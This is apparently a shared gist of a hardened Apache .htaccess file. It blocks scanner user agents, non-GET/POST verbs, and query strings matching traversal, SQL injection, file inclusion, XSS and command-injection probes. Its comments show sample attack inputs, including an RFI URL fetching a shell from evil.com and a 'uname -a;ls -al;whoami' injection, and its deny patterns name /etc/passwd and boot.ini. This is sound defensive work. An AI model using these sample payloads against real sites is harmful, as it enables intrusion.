@iamstoick
Created July 23, 2018 06:53
Apache htaccess hardened
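# Hardened Apache Mod_Rewrite Security Rule
# Provided by Aung Khant,http://yehg.net
# Last Updated: 2011-02-24
# Note: You must experiment which strings make access denied in normal clean traffic. Remove such rules. Contact me if you can't.
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html
# rewritecond
# NC = 'nocase|NC' (no case-sensitive)
# OR = 'ornext|OR' (or next condition)
# L = last rule
#
# How this file works: every RewriteCond below except the first is chained
# with [OR] into one group; the single RewriteRule at the end fires when ANY
# condition in that group matches and answers 403 Forbidden. The first
# RewriteCond carries no [OR] and is therefore AND-ed with the whole group:
# it exempts the error page itself.
#
# Scope and limits, to be read before relying on this file:
#  - HTTP_USER_AGENT is supplied by the client, so the user-agent rules only
#    stop tools that do not bother to change it. Treat them as noise
#    reduction, not as an access-control boundary.
#  - %{QUERY_STRING} is matched as sent, before URL decoding, so each pattern
#    only matches the exact spellings and encodings listed in it.
#  - These are signature filters. They complement, and do not replace,
#    parameterised queries, output encoding and path canonicalisation in the
#    application. After deploying, watch the 403s in the access log for
#    legitimate traffic being denied and prune rules accordingly.

RewriteEngine on

# Serve a friendly page for 403 instead of Apache's default error text.
# (The original rule put this path in the RewriteRule substitution, which
# is not used when the [F] flag is present.) From .htaccess this directive
# needs AllowOverride FileInfo. Replace the path with your real error page.
ErrorDocument 403 /path/to/friendly_error.php

# Exempt the error page itself. ErrorDocument is served through an internal
# redirect that is evaluated against these same conditions (same user agent,
# same method); without this exemption the redirect is denied too and the
# client gets the default error text anyway.
# No [OR] here on purpose: this condition is AND-ed with the group below.
RewriteCond %{REQUEST_URI} !^/path/to/friendly_error\.php$

# Allow only GET and POST verbs
# 'Coz most vul scanners use HEAD for hunting buggy files existence
# Caveat: this also rejects HEAD from monitoring and caching clients and
# OPTIONS used by CORS preflight. Add a verb to the list if your site needs it.

RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]

# Ban Typical Vulnerability Scanners and others
# Kick out Script Kiddies

# void of UserAgent (empty string)
RewriteCond %{HTTP_USER_AGENT} ^$ [NC,OR]

# Known scanner / bot user-agent fragments.
# Several tokens are generic (java, perl, python, curl, ruby, lynx, wget, scan,
# email, grab, extract, loader, Yandex, Microsoft Office, Internet Explorer
# 4.01) and also deny legitimate clients: the Yandex crawler, Office link
# previews, scripted integrations, some monitoring agents. Prune to fit your
# traffic, as the note at the top says.
# The "Toata dragostea mea pentru diavola" entry is a plain alternative; the
# stray escaped pipe in front of it required a literal '|' in the agent string
# and made the entry unmatchable.
RewriteCond %{HTTP_USER_AGENT} ^.*(0d 0a|sqlmap|ApacheBench|WhatWeb|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|lynx|Netsparker|Nstalker|ZmEu|libwww|perl|java|curl|ruby|python|nikto|wikto|pikto|pykto|scan|acunetix|qualys|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r|w3af).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|wget|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]

# Disable access to cgi-bins if not used
# Remove this condition if any of these directories is actually served.

RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]

# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT
# Directory Traversal, Null Byte Injection, HTTP Response Splitting
# Reminder: QUERY_STRING is undecoded, so only the encodings spelled out
# below are covered.

RewriteCond %{QUERY_STRING} ^.*(\.\./|\.\.%2f|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL Injection Probing
# The second condition matches "or"/"and" followed by an encoded space and a
# digit=digit comparison; it can also hit ordinary text that ends in those
# letters, so check it against your own query strings.

RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]

# Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
# The RFI condition only fires when the query string ends in '?'.

RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (passwd|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]

# PHP Version Probing
# Matches a query string that starts with "=PHP".

RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]

# XSS Probing
# Matches '<' (raw or %3C), then "script", then '>' (raw or %3E), anywhere.

RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]

# PHP GLOBALS Overriding

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP REQUEST variable Overriding

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
# Last condition of the [OR] group, so no [OR] flag here. [NC] is kept for
# consistency with every other condition in this file.

RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC]

# Deny access
# With [F] the substitution is not used, so '-' leaves the URI untouched and
# the 403 body comes from the ErrorDocument directive above.

RewriteRule .* - [F,L]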